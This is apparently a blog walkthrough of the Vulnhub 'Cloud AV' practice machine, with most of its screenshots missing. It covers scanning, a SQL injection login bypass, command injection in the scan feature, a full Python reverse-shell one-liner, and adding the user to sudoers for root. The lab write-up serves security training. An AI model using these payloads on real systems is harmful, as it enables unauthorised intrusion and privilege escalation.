Vulnhub BoredHackerBlog: Cloud AV Walkthrough

The description states:  "Cloud Anti-Virus Scanner! is a cloud-based antivirus scanning service.  Currently, it's in beta mode. You've been asked to test the setup and find vulnerabilities and escalate privs."

This box is labeled easy and I think that's fair enough although a couple of sections may hang some people up. 

First, we kick off with Nmap:

Not a whole lot of options so we'll explore port 8080:

Meanwhile, Nikto is running:

We find an additional page:

Circling back to the first page, let's see if we can get some sort of injection:

When we select the Log in button, we get:

I'm not sure I've encountered SQLite but the syntax is nearly the same.  Instead of:  '1 or '1'='1

We go with:

If you're not familiar with SQL injection, basically, we're saying the invite code is (NOTHING) or 1=1.  And since 1 does equal 1, a true statement, we bypass this process.  And we do...

Assuming we're supposed to choose one of the above files, I choose hello and select Scan! :

Wondering if we can abuse this...

Turns out, we can:

Now I'm wondering if we can get out:

With our handler setup:

Excellent!  We can reach out.  Let's go for a reverse shell:

What you can't see:

; python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/bash","-i"]);'  

With our handler setup:

We catch our shell!  Looking around:

We have a compiled binary and what I assume is the source code. 

Let's take a look:

Looks like we can abuse it:

We get execution of a command as root.  Excellent!  Let's shove our user into sudoers with all permissions and no password:

We sudo su and we're root! 

Nice box!